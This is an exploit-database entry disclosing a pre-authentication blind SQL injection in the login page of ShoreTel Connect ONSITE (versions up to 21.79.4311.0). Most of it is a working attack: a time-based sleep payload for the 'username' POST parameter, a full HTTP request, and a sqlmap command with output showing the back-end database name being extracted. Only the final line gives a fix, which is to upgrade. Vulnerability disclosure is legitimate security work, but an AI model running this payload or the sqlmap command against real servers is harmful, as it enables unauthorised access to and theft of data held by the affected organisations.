ShoreTel Connect ONSITE - Blind SQL Injection

ID 1337DAY-ID-25463
Type zdt
Reporter Iraklis Mathiopoulos
Modified 2016-09-19T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability
# Date: 19-09-2016
# Software Link:
# Exploit Author: Iraklis Mathiopoulos
# Contact:
# Website:
# Category: webapps
1. Description
Versions of ShoreTel Connect ONSITE prior and including 21.79.4311.0
are vulnerable to a Blind SQL Injection in /authenticate.php, on the webserver
that is running the Conference system.
Specifically, the POST parameter "username" is not sanitised prior to being used
in SQL Queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20
for the username value the server will respond after approximately 35 seconds.
No authentication is needed in order to exploit the vulnerability as the issue
resides in the pre-authentication realm of the system.
2. Proof of Concept
POST https://[REDACTED].com/authenticate.php HTTP/1.1
Host: [REDACTED].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852
Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
- ---
[email protected]:~/projects# sqlmap -r req.burp -p username --dbms=mysql
--technique=T --time-sec=10  --level=5 --risk=3 --current-db
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201607120a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|
[*] starting at 19:59:34
[19:59:34] [INFO] parsing HTTP request from 'req.burp'
[19:59:34] [INFO] testing connection to the target URL
[19:59:42] [INFO] checking if the target is protected by some kind of
sqlmap resumed the following injection point(s) from stored session:
- ---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123'
'jIev&vpassword=&SUBMIT1=Sign In
- ---
[19:59:54] [INFO] testing MySQL
[20:02:25] [INFO] confirming MySQL
[20:03:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[20:03:12] [INFO] fetching current database
[20:03:12] [INFO] retrieved: [REDACTED]
current database:    '[REDACTED]'
[20:21:10] [INFO] fetched data logged to text files under
[*] shutting down at 20:21:10
3. Solution:
Install the latest version of ShoreTel Connect ONSITE
Related ShoreTel security bulletin:

# [2018-02-19]  #